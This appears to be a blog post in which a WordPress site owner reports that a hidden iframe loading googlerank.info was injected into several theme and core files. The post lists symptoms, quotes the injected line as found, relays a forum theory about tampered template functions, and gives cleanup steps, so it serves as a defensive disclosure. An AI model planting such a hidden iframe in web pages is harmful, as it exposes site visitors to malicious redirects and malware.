It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins were causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.
Before I begin describing the issue, I want to state that I do not have a permanent fix (though I do have a temporary one). The purpose of this post is to document my findings for anybody who has experienced the symptoms or is interested in helping me find and fix the underlying issue. I’ve found very little documentation on this problem thus far, so I’m hoping to provide some clarity to all others who may be searching for it.
<iframe> that points to googlerank.info has been found embedded into a handful of files that are associated with a WordPress installation. The
<iframe> always appears at the very bottom of the source code, just before the
</body> tag. It is possible that WordPress presents a vulnerability that allows an unauthorized user to access and alter files, thereby compromising the security of the site owner as well as the site’s visitors.
Here are some of the symptoms to look out for:
- Your site loads for an instant, and quickly redirects to a 404 Page Note Found error page.
- While your site is loading, your status bar may read “Waiting for http://googlerank.info/…”.
- Viewing your site on older browsers crashes the browser. This has been mostly reported by users on IE6.
- Your anti-virus software may detect suspicious activity from your site.
I have not personally experienced the last 2 symptoms, so I unfortunately can’t provide any more details on them. If you’ve experienced any of these symptoms and are able to provide a screenshot or a copy of the error message, please contact me or leave a comment on this post.
Please also note that some of these symptoms occur inconsistently and only for a handful of visitors. I’ve encountered these problems no more than 2 or 3 times myself, but have heard about it enough times from visitors that it concerns me.
When I first set out to figure out why this site was bringing up errors, the first place I looked was the generated source code (right click > View Source). I slowly went through the syntax line-by-line to see if anything was out of place and discovered this little nugget at the very bottom, right before the
<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
How odd, an embedded hidden
<iframe> that was loading a mysterious website called googlerank.info. Diving deeper into the investigation, I discovered that the same line of code was appearing in my WordPress Site Admin as well. As I continued to dig through the files on my server, I found that that there were a handful of other files that had been somehow altered to include the same bit of code.
Here is a complete list of files that the above code appeared in:
There are likely more, but those are the ones I found after searching for nearly a hour.
If you visit googlerank.info, you will find an imitation Google error page that says the following:
The requested URL /counter was not found on this server.
The page looks like this:
However, from time to time, the site won’t load, and instead, you will see this:
Note that Firefox reports that it couldn’t “establish a connection to the server at medicasntred.com”. The URL of the page is also no longer googlerank.info, and instead reads ‘http://medicasntred.com/check/upd.php?t=563′ (it is NOT suggested that you visit this URL). The Whois record for mediasntred.com can be found here.
Doing a quick Google search on the issue returns very few WordPress-related results. However, it seems as though many other open source platforms have been compromised in the same fashion.
Searching the WordPress Support Forums however results in the following thread about WordPress 2.2.2 being hacked. In this thread, snorkelman describes very similar symptoms to those I’ve described above. He even offers a hypothesis for what was causing the issue:
The get_header() and get_footer() functions in general_template.php were modifed. get_header() created a cookie called “yahg”, and get_footer() looked for it. If it found it, it sucked in some code from googlerank.info. The actual line it inserted was hidden by being base64 encoded, but it showed up on the site looking like this:
<iframe src=<http://googlerank.info/counter> style=display:none>
At the time of posting, snorkelman was running WordPress 2.2.2, which was known to be vulnerable and which prompted the WordPress folks to release a critical security update to version 2.3.3. The issue was shrugged off as having been caused by 2.2.2′s vulnerability and the topic was put to rest.
I’ve since resurfaced the thread by posting my situation in hopes that it will alert people that this hack seems to still be active in version 2.3.3.
From my research and exploration, here are a few things I’ve figured out about this problem:
- The vulnerability that the hack takes advantage of may have existed in the last few versions of WordPress as I found the code lingering in /wp-includes/js/tinymce/license.htm, which I believe no longer exists in WordPress’ installation, and has been replaced by license.txt instead. However, it could also simply be that the file was left over from past versions and was only altered recently.
- The hack was performed in the past 3 weeks, as that’s when I last updated the footer.php file of this current theme (as you’ll read below, re-uploading your files gets rid of the unwanted code). This also means that the vulnerability definitely exists in version 2.3.3, and was not simply carried forward from version 2.2.2, as I had done my upgrade when it was first released (which was more than 3 weeks ago).
- The hack seems to target primarily .htm and .php files that have
</body>in them. This is where the code is usually inserted.
- In response to snorkelman’s hypothesis above, I haven’t found anything in the get_header() function that creates a cookie named “yahg” and that passes it on to the get_footer() function, though that is a scary thought.
- I cleaned up my files yesterday and the code has not returned thus far. This is good news as it suggests that the code is not self-regenerating.
As noted at the beginning of this post, I don’t have a permanent fix for this issue. I believe the source of the solution exists within the WordPress code structure itself, which I haven’t looked extensively enough at to be able to diagnose. I do however have a temporary fix, which doesn’t guarantee that the issue will not resurface.
Find out if you’re a victim
First, see if you or your visitors have been experiencing any of the symptoms described above. Next, check the source code of your WordPress site (both the front-end and the back-end/site admin) to see if there is a hidden
<iframe> embedded right before your
</body> tag. If you see it there, then it’s likely that a number of other files have also been tampered with.
Update your files
The temporary solution to this issue is to simply overwrite the server’s files with your clean files. Follow these steps:
- Re-upload your theme’s footer.php file to your theme folder. Make sure that the footer.php file you have doesn’t have the line of code in it (in case you might have downloaded it from the server before).
- If you are editing your theme files from the WordPress site admin, go to your Theme Editor (Presentation > Theme Editor) and click on Footer on the right-hand side. Scroll to the bottom of the file and delete the following line of code:
<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
- Download the latest version of WordPress from here.
- Copy the /wp-admin/ and /wp-includes/ folders into your server and overwrite the existing files. This will ensure that all your files are clean.
I wrote this post in hopes of bringing some necessary attention to this issue. I’m fairly confident that I’m not the only one who has been affected by this. In fact, I’m pretty sure that many people who have been affected aren’t aware that their site has been compromised.
If you own a WordPress site yourself, I encourage you to do a quick check to make sure you’re clean. If you know others who own WordPress sites, please pass this on to them. If you own a site that has the ability to communicate to a broad audience that this issue may be relevant to, I encourage you to spread the word by writing about this or linking to this post.
Let’s hope we get to the bottom of this and can get a permanent fix in the next version of WordPress!
After some follow-up reading, I found the following article on another individual’s experience with WordPress being hacked. The post was written in November 2007, so the author was definitely using a version of WordPress that preceded 2.3.3. The description of the issue is actually very similar to what snorkelman had described in the WordPress forums (see above). Perhaps my case is an evolution of the same hack or possibly the result of only half of the hack working.
I’ll keep posting updates as I uncover more. Thanks to those who have begun spreading the word already.икони